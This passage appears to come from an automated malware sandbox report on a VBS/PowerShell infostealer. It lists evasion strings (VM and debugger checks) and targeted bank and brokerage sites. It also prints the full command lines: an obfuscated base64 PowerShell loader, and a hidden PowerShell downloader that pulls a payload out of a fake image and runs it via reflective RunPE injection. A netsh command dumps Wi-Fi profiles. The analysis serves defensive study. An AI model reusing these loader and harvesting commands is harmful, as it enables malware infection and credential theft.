          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: wscript.exe, 00000000.00000003.1408406314.00000260C4BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4C5C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C5C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qemucaqecet
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine: False
          Source: AddInProcess32.exe, 00000009.00000002.1674833738.000000000148A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: siqemuwalidilenigeg
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000305F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine: ;
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: momulumeguqemuyufum
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: global block list test formVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHook
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: powershell.exe, 00000005.00000002.1593249339.0000021C89401000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: gWtuVMciUCk47FiAJeN
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHook.dll
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: discord.comVMware20,11696494690f
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmousever.dll
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmousever
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmouseverLR
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qodoqemuned
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareLR
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine:
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHookLR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06427368 CheckRemoteDebuggerPresent,9_2_06427368
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
          Source: Yara matchFile source: amsi64_7908.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 410000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 412000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: FAE008Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredkdgtreodgtredgtrevdgtreddgtredgtremqdgtrezdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredgdgtremgdgtre4dgtredqdgtremqdgtrezdgtredgdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('runpe.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\c\program files\' , 'aburrar','addinprocess32',''))} }"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgt